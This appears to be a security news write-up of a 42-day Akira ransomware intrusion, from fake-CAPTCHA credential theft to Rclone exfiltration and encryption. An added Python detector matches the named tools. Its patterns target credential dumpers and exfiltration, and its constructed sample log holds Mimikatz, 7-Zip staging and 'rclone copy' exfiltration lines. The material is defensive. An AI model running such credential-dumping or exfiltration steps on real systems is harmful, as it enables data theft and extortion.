Concise Cyber


Anatomy of an Attack: Akira Ransomware’s 42-Day Compromise via Fake CAPTCHA

In a detailed incident response investigation, security researchers uncovered a sophisticated Akira ransomware attack that persisted within a victim’s network for 42 days. The initial point of entry was a fake CAPTCHA page that harvested user credentials. The threat actor used these stolen credentials to log in to the organization’s VPN, an entry point that lacked multi-factor authentication (MFA), so the stolen password alone was enough to get in.

Initial Access and Reconnaissance

Once inside the network, the attacker established persistence by installing legitimate remote access tools, including AnyDesk and RustDesk. This allowed them to maintain access and control over compromised systems. Following this, the actor began an extensive reconnaissance phase to understand the network topology and identify valuable targets. They employed tools like Advanced IP Scanner and SoftPerfect Network Scanner to map the internal network. To escalate privileges and move laterally to other systems, the attacker used well-known credential harvesting utilities such as Mimikatz and LaZagne to extract passwords and credentials from memory and system storage.

Data Exfiltration and Ransomware Deployment

After identifying and collecting sensitive data, the threat actor prepared it for extraction. The files were compressed and staged with the 7-Zip archiving tool. For exfiltration, the attacker used the command-line program Rclone to transfer the staged archives to a third-party cloud storage provider, completing the data theft. The entire operation, from initial compromise to final action, spanned 42 days. The final stage was the deployment of the Akira ransomware payload across the compromised network, encrypting critical files and systems to extort a ransom from the victim organization.
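The tool chain described in the two sections above (remote access tool, network scanner, credential dumper, 7-Zip staging, Rclone exfiltration) is exactly the kind of sequence a defender can correlate from process-creation telemetry. The following is an added example, not code from the original write-up or its researchers: it replays constructed process events, classifies each into a stage of that chain, and alerts on hosts that show several stages, also computing the dwell time between first and last sighting. The log format, hostnames, user names, paths and the "netscan" binary name for SoftPerfect Network Scanner are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# One pattern per stage of the chain described above, keyed on the tools the
# write-up names; "netscan" is the assumed SoftPerfect Network Scanner binary.
STAGES = [
    ("remote_access", re.compile(r"\b(anydesk|rustdesk)\b", re.I)),
    ("recon", re.compile(r"advanced_ip_scanner|advanced ip scanner|\bnetscan\b", re.I)),
    ("cred_dump", re.compile(r"\b(mimikatz|lazagne)\b", re.I)),
    ("staging", re.compile(r"\b7z(\.exe)?\s+a\b", re.I)),
    ("exfil", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
]

def classify(cmdline):
    """Return the first chain stage whose pattern matches the command line, else None."""
    for name, pat in STAGES:
        if pat.search(cmdline):
            return name
    return None

def parse_event(line):
    """Parse the constructed 'ISO-time host user command-line' record format."""
    ts, host, user, cmd = line.split(" ", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}

def detect_chain(lines, min_stages=3):
    """Per host, record the first sighting of each stage; return only hosts with at
    least min_stages distinct stages (one tool alone, e.g. 7-Zip, is a weak signal)."""
    seen = defaultdict(dict)
    for line in lines:
        ev = parse_event(line)
        stage = classify(ev["cmd"])
        if stage:
            seen[ev["host"]].setdefault(stage, ev["ts"])
    order = [name for name, _ in STAGES]  # present hits as a chain-ordered timeline
    return {h: sorted(st.items(), key=lambda kv: order.index(kv[0]))
            for h, st in seen.items() if len(st) >= min_stages}

def dwell_days(timeline):
    """Whole days between the earliest and latest matched stage on one host."""
    times = [ts for _, ts in timeline]
    return (max(times) - min(times)).days

SAMPLE_LOG = [  # constructed events, not data from the incident
    "2024-01-03T09:12:00 FS01 jdoe C:\\Users\\jdoe\\Downloads\\AnyDesk.exe",
    "2024-01-05T14:02:10 FS01 jdoe C:\\Temp\\Advanced_IP_Scanner.exe",
    "2024-01-09T22:41:33 FS01 jdoe C:\\Temp\\mimikatz.exe",
    "2024-02-14T09:30:00 FS01 jdoe C:\\Temp\\7z.exe a C:\\Temp\\out.7z D:\\Finance",
    "2024-02-14T10:00:00 FS01 jdoe C:\\Temp\\rclone.exe copy C:\\Temp\\out.7z remote:bucket",
    "2024-01-04T10:00:00 WS07 asmith C:\\Windows\\System32\\notepad.exe report.txt",
]

for host, timeline in detect_chain(SAMPLE_LOG).items():
    print(host, [s for s, _ in timeline], "dwell:", dwell_days(timeline), "days")
```

Raising `min_stages` trades recall for precision; in practice the same stage map would be fed from EDR or Sysmon process-creation events rather than the constructed lines here.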